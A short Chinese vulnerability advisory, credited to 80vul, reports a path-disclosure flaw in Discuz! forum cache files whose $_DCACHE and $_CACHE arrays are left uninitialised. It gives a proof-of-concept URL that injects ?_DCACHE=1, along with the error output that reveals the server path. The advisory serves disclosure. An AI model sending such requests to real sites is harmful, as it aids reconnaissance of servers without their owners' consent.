由于Discuz! cache file的数组$_DCACHE,$_CACHE等的变量名没有初始化导致路径信息泄露.
author:80vul-A
team:http://www.80vul.com
一 分析
目录\uc_client\data\cache\,\forumdata\cache等下面的文件里对如:
<PRE><CODE>$_CACHE['settings'] = array ('accessemail' => '','censoremail' => '','censorusername' => '','dateformat' => 'y-n-j','doublee' => '1','nextnotetime' => '0','timeoffset' => '28800',);$_DCACHE['settings'] = array ('accessemail' => '','adminipaccess' => '','admode' => '1','archiverstatus' => '1','attachbanperiods' => '','attachimgpost' => '1',</CODE></PRE>
数组$_DCACHE,$_CACHE等没有初始化,其实dz的安全人员已经考虑到了这个问题,如在include\common.inc.php
<PRE><CODE>$_DCOOKIE = $_DSESSION = $_DCACHE = $_DPLUGIN = $advlist = array();</CODE></PRE>但是想对于独立的Discuz! cache file并没有初始化,当我们提交?_CACHE=1 或者_DCACHE=2 导致错误而暴露路径等信息.
二 利用
poc如:
http://www.80vul.com/bbs/forumdata/cache/cache_usergroups.php?_DCACHE=1
Notice: Array to string conversion in xxx\forumdata\cache\cache_usergroups.php on line 6
三 补丁[fix]
等待官方补丁.